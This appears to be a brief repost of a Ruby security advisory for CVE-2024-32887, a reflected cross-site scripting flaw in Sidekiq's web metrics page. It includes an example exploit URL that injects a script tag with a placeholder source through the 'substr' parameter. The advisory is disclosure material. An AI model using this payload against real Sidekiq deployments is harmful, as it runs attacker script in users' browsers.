CVE-2024-32887 (sidekiq): Reflected XSS in Metrics Web Page

Ruby Security Advisory

Reflected XSS in Sidekiq Web UI via the `/metrics` HTTP end-point and the
`substr` query param:

https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}%22%20/%3E

READ MORE

Leave a Reply

Your email address will not be published. Required fields are marked *